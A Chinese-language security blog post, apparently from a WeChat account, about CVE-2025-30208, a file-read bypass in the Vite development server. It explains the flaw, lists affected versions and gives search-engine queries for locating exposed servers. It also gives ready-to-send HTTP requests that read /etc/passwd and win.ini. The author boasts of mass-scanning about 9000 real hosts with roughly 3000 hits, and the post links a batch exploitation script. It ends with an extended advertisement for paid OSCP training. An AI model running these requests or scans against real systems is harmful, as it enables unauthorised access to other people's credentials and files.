CVE-2025-30208是Vite开发服务器
中存在的一个高危逻辑漏洞，允许攻击者通过构造特殊的URL绕过文件访问限制，读取服务器上的任意文件（如配置文件、密钥、数据库凭据等）。该漏洞的利用条件需满足两点：开发服务器通过–host或server.host配置
暴露至网络（非默认配置），且使用受影响版本的Vite由于Vite广泛应用于Vue、React等主流前端框架
，潜在影响范围涉及数十万级资产。

漏洞原理

漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数（如?raw??或?import&raw??）时，Vite对URL尾部分隔符（如?和&）的正则匹配不严格，导致安全检查被绕过。例如，攻击者可构造类似/@fs/etc/passwd?raw??
的请求，利用@fs机制（本用于访问项目允许列表内的文件）读取系统敏感文件官方修复方案通过正则表达式/[?&]+$/
移除URL末尾的冗余分隔符，从而阻断绕过路径。

漏洞POC

漏洞特征

fofa&&quake

body="/@vite/client"

鹰图Hunter

web.body="/@vite/client"

影响范围

6.2.0 <= Vite <= 6.2.2
6.1.0 <= Vite <= 6.1.1
6.0.0 <= Vite <= 6.0.11
5.0.0 <= Vite <= 5.4.14
Vite <= 4.5.9

POC

Linux下

GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

window下

GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

注意再进行关键字搜索：
以Linux举例

The server is configured with a public base URL of

有一些非常有好的提示，告诉我们路径错了，应该安装它这样
注意在进行指定https搜索

plain HTTP request

总共大概跑了9000多条，出了大概快3000了，出货量很高，不过修的也是真的快，估计修了一半多了

批量检测脚本

项目地址

https://github.com/ThumpBo/CVE-2025-30208-EXP

或者后台发送CVE-2025-30208
获取

oscp+培训

在boss直聘搜索oscp，cisp进行对比

在你还在犹豫是否要报名OSCP的时候，别人已经行动了，在学习完oscp培训和泷羽sec的红队全栈课后，去考OSCP拿下竞争力，别人月入过几万了
而你却还在为没有能力证明和没有工作而发愁，那为什么不行动起来呢?4000的价格比外面培训低了一半多，在加活动更低，也就这一次机会，后面都不会有了
，就明年的这个时候才考虑举办。

oscp+培训福利

1、报名一次oscp培训即可无限学习下一期
，下下一期，学到你会再去考试oscp

2、学生党想找工作的或者上班的想换工作的学完oscp可以找泷羽sec推荐（自己有技术实力就行）

3、4000培训费用证明学生，可以分期，无利息
，还优惠500

4、拥有CISSP、OSCP、OSEP等多项专家认证的在职高级红队泷老师
的就业方向指导

5、官方的oscp+有团购优惠，10人组团可以打8折优惠，如果在我们这里报了培训，到时候报名的时候就可以联系大陆官方负责人给你们凑团购，8折团购可以便宜几千

6、感兴趣的师傅们可以找我咨询

学习交流群

可以加入学习交流群，里面有学习一些资源。泷老师也在里面，有什么学习方面不会的大家可以一起交流，共同进步。如果问题比较困难可以问泷老师，他会帮忙解答的。如果二维码过期，后台发送安全屋获取新的二维码。

由于直接放群二维码有很多广告加进来，如果想加入学习交流群的师傅请扫码添加我为好友，再拉你进群，避免广告进入。

我们红队全栈公益课链接：https://space.bilibili.com/350329294

CVE-2025-30208，资产巨多（中国域名资产：12635+），附POC+批量检测脚本

CVE-2025-30208，资产巨多（中国域名资产：12635+），附POC+批量检测脚本

前言

往期推荐

漏洞信息